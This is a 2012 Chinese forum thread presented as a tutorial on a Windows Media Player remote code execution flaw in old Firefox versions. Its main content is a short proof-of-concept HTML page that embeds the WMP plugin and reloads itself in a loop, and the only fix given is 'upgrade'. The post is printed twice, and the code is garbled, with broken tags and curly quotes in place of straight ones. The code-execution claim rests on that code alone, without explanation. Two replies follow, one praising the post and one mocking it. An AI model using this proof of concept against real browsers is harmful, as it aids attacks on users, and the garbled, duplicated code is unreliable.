edit_note帖子
64
stars积分
2,076
event加入
2011-02-07
电脑网络
【漫天教程】Windows Media Player 远程代码执行漏洞及修复
schedule发表于 2012-03-09 19:08:00
visibility查看 324
chat_bubble回复 2
#1 楼主
漏洞类型:代码执行
影响版本:Version: FF 3.5.10 & 3.6.6 with WMP 10 & 11
漏洞描述:Windows Media Player存在远程可执行代码漏洞
漏洞测试代码:
(HTML> (HEAD> <SCRIPT> function go() { var oWMP = document.getElementById(“WMP“); if (oWMP) { location.reload(); } else { var oWrapper = document.getElementById(“wrapper“); oWrapper.innerHTML = ‘‘<EMBED id=“WMP“ type=“application/x-mplayer2“ autostart=1 src=“repro-firefox.html“></EMBED>‘‘; setTimeout(go, 1000); } } </SCRIPT> (/HEAD> (BODY onload=“go()“> <SPAN id=“wrapper“></SPAN> (/BODY> (/HTML>
修复:
升级
影响版本:Version: FF 3.5.10 & 3.6.6 with WMP 10 & 11
漏洞描述:Windows Media Player存在远程可执行代码漏洞
漏洞测试代码:
(HTML> (HEAD> <SCRIPT> function go() { var oWMP = document.getElementById(“WMP“); if (oWMP) { location.reload(); } else { var oWrapper = document.getElementById(“wrapper“); oWrapper.innerHTML = ‘‘<EMBED id=“WMP“ type=“application/x-mplayer2“ autostart=1 src=“repro-firefox.html“></EMBED>‘‘; setTimeout(go, 1000); } } </SCRIPT> (/HEAD> (BODY onload=“go()“> <SPAN id=“wrapper“></SPAN> (/BODY> (/HTML>
修复:
升级
全部回复 (2)
2012-03-09 19:11:00
沙发
你牛,我顶!0
2012-03-09 22:17:00
板凳
看了楼主的帖子,我关掉UC浏览器,起身打开冰箱,拿出一瓶农妇山泉,拿在手里走到窗前,凝视远方,外面蒙蒙的天空下着小雨,看着窗外,我的心情更忧郁了,我再也无法抑制内心的情感,打开窗子,对着窗外大声呐喊道:楼主,你写的这是神马几把玩意。
登录 后才能回复
flag举报帖子